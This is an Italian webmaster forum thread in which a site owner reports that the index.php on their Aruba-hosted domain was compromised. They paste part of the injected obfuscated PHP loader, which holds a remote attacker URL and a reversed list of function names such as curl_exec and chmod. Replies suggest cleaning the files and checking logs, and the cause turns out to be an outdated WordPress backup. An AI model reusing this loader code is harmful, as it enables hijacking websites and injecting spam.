[Dominio] File con permessi 444 e codice malevolo

felino

Utente Attivo
12 Dic 2013
940
10
18
Aci Catena (Catania)
Buongiorno a tutti,
ho un dominio su Aruba, nel ho pubblicato:
- un ecommerce nella directory /shop
- un file index.php nella root che al momento fa un redirect alla cartella /shop

Da un mesetto circa il file index.php e' stato modificato (non da me) con del codice malevole con tutte le conseguenze del caso.

Il problema e' che tale file ha i permessi settati a 444, provo a modificarli e ottengo un messaggio di errore.
Ho richiesto supporto ad Aruba.it per la cancellazione, una volta cancellato viene generato nuovamente.
Stesso identico problema ce l'ho con il file .htaccess

Qualche suggerimento?

Qui una parte del contenuto:
PHP:
<?php @'$
yumingid=47
lineid=2332
x3=index.php/
x4=ghpyxlOwbV
x5=underlying,roadside,alone,ethics,smaller,hotpants,agree,jasper,horse,Baby,stick,despair,SharkFin,bulk,Apprentice,whole,plow,coconutmilk,trunklineelectrification,inspire,impossible,pantyhose,earthquake,sage,BarberShop,carrier,evidence,English,Latin,definite
x6=
x7=http://jnice01.ouuwtizhy573nskt/weilai0.php
cache=0000
sps=111111000
urlgz=[0:3]^[0:8]-[0:6~12][1:6]/[0:8~10]!/|[0:7~10]^/[1:8]/!/[0:10~15]/|[0:8~10]^-[2:10~12]-[2:4]-[2:6]-!/|^-[2:8~12]-[2:5~10]-[0:5][1:8]/![0:3]/|^[0:10~12]/[0:1]_[2:8~12]-!/|[0:10~12]^/[0:6~12]_[1:6]-!/|[0:10~15]_[0:6~10]-^-![0:2]/|[0:10~12]-[0:1]^-[0:4]-[0:1]!-[0:10~12]/|[0:1]^-[0:3]-[0:10~12]-[0:5]-[0:5]!/|^/[0:10~12]_[1:3~5][0:4]-[0:8]-!/|^[0:5]_[1:5]_[2:12~15]_!|[0:3~5]-^-[1:10~12]-[0:10~12]/![0:2]|^[0:6~8]/[1:8~12]-!/[0:5~8]|^_[1:6~8]_[1:6~8]/[2:8~12]_[0:5~8]/!|[0:12]_^-[2:10~15]_[0:6~8]_!|[0:10~15]/^-[1:6~8]/!|^[3:6~10]/[0:1]_[2:12]_!|[0:8]/[0:6~8]/^-!/[0:8~10].php|^/[2:10~12]/[1:8~10]-!-[0:3].jp|^_[1:6~8]/[1:6~8]_[0:10~12][1:5]/!.jp|[0:3]^[0:3]-[2:8]-[1:5][0:3]-[2:6]-[0:6][1:4]/[0:2]!.html|[0:8~10]/^-!/[0:15~18].html|[0:6~8]/[0:15~18]/^-!.html
';$bbb6b6b66=explode("1l","tilps_gerp1ledocnelru1lemaner1lyarra_ni1lezilairesnu1lstegf1l5dm1lcexe_lruc1lofniphp1lstnetnoc_teg_elif1lrtsbus1ldomhc1llla_hctam_gerp1ldnar_tm1lrewolotrts1lnelrts1lrhc1letad1lemit1lemitmelif1lliec1lgnol2pi1lnepof1ltroba_resu_erongi1lsehsalscdda1ldnar_yarra1llru_esrap1lenifed1ledocedlru1lemanybtsohteg1lelffuhs1lfoef1lrtrts1ltini_lruc1ltfihsnu_yarra1lftnirps1ledolpmi1lciremun_si1lhcuot1letirwf1lyarra_si1lemitotrts1ltimil_emit_tes1lredaeh1legrem_yarra1leuqinu_yarra1ltrats_bo1ltnuoc1lelif_si1lstsixe_noitcnuf1lstsixe_elif1lhctam_gerp1lecalper_gerp1leikooctes1lsoprts1lmirt1lsopirts1lrddaybtsohteg1ltcartxe1legnar1lesolcf1ldro1ledolpxe1lpop_yarra1lsoprrts1lesolc_lruc1ltpotes_lruc1lecalper_rts");foreach($bbb6b6b66 as$b6bbbbbbb=>$bbbb6b6)
.....
 
Ultima modifica di un moderatore:

Utixo Cloud Services

Nuovo Utente
26 Mar 2019
8
0
1
Milano
utixo.it
semplice, pulisci il codice a mano perche non ce altra possibilita e poi devi capire come riescono ad accedere al filesystem, di solito dai log si puo capire facilemente. Oppure ripristina un backup precedente alla modifica dei files.
 

Max 1

Super Moderatore
Membro dello Staff
SUPER MOD
MOD
29 Feb 2012
4.449
338
83
@felino
Quando posti del codice PHP devi usare il tag [ PHP] non il tag [ CODE]
Grazie
 

felino

Utente Attivo
12 Dic 2013
940
10
18
Aci Catena (Catania)
semplice, pulisci il codice a mano perche non ce altra possibilita e poi devi capire come riescono ad accedere al filesystem, di solito dai log si puo capire facilemente. Oppure ripristina un backup precedente alla modifica dei files.

Ho trovato il problema, nel server era presente una versione di backup e non aggiornata di Wordpress....quella ha generato il problema!

@felino
Quando posti del codice PHP devi usare il tag [ PHP] non il tag [ CODE]
Grazie

Hai ragione, scusami!
 
Discussioni simili
Autore Titolo Forum Risposte Data
M Trasferire data plugin da un dominio ad un altro WordPress 6
M [Vendo] [Dominio] alternativedolls.com Compravendita siti e domini 0
D Dubbio intestazione dominio Domini 0
voldemort Scoprire hosting di un dominio Hosting 1
I dominio aruba versione php server linux Domini 3
Shyson [VENDO][DOMINIO] Compravendita siti e domini 0
R [VENDO] [DOMINIO] MilanoCortinaOlimpiadi Compravendita siti e domini 0
P Vendo dominio Compravendita siti e domini 0
D [VENDO] dominio.com Compravendita siti e domini 0
M Vendo Dominio NoiSoli.it (DA 23 - PA 22) Compravendita siti e domini 0
W Nome di dominio efficace: 3 parole chiave o nomecognome? SEO e Posizionamento 0
L Caricamento dominio con FTP già preesistente in rete Domini 2
R Confrontare il dominio di una mail con una stringa contenente un dominio personalizzato, tutto ciò in php o javascript PHP 0
L Sovrascrivere CSS iframe su dominio diverso WordPress 0
L Consiglio SEO gestione dominio + free hosting SEO e Posizionamento 6
A [Joomla] Dominio compromesso da malware Domini 9
M1k22SEO [VENDO DOMINIO] aesurfpoint.it (TF 25 | CF 20 | DA 24) Compravendita siti e domini 0
Shad87 Problema associazione dominio-hosting Hosting 1
K Problema di indicizzazione con dominio vecchio vuoto SEO e Posizionamento 2
C [ Vendo ] Dominio di primo livello Compravendita siti e domini 0
Andrei Daniel Glodeanu [Vendo]Dominio Compravendita siti e domini 1
W Puntamento DNS di un dominio verso un Server Dedicato Server Dedicati e VPS 1
K Vendo Dominio web travel quotato Compravendita siti e domini 3
A Agriturismo italiano con dominio tedesco Domini 3
W landing Page su dominio 1° livello oppure su 3° livello? SEO e Posizionamento 2
R Sito wordpress da dominio in locale: Errore WordPress 3
B Data Registrazione Dominio Domini 1
P Vendo dominio + sito Coworkingcafe.it su sitemarket.mrwebmaster.it Compravendita siti e domini 0
C [CEDO] DOMINIO [.it] Compravendita siti e domini 0
F Nome Dominio non disponibile Domini 1
bubino8 Cambio puntamento IP di un dominio Mac e Software 0
R trasferimento dominio e webmail Posta Elettronica 1
R Vendo sito E-Commerce Dropshipping + Dominio + pagine Facebook/Instagram Compravendita siti e domini 4
J [PHP] Estrapolare utente dominio da pc PHP 2
I Recupero accesso pannello di controllo dominio Leggi, Normative e Fisco 2
J [PHP] [HTML] Trasferire dati da un form ad un dominio diverso. PHP 3
T Vendo dominio: farecashonline.com Compravendita siti e domini 0
Aragosta Dominio it oppure com ed indirizzi email Domini 6
F [CEDO][DOMINIO] romapub.it Compravendita siti e domini 1
jonnino2004 domanda su acquisto dominio libero Domini 1
jonnino2004 [VENDO][DOMINIO] dominio tv-blog.t solo dominio Compravendita siti e domini 0
jonnino2004 indicatori di bontà di un dominio Domini 7
wondercommerce [PHP] Dominio per sito sportivo Compravendita siti e domini 0
bubino8 [WordPress] Trasferimento Sito con cambio Dominio(url) WordPress 6
gaspare490 Puntare spazio web su dominio esterno Domini 1
andry79fi [CEDO] - winserver.it - Solo Dominio Compravendita siti e domini 0
G [VENDO] Dominio .it Compravendita siti e domini 0
N Acquisto Dominio e utilizzo di CMS Domini 3
F [VENDO][DOMINIO] dpdc.it solo dominio Compravendita siti e domini 1
bubino8 [PHP] Estrarre dominio No Sottodomini PHP 10

Discussioni simili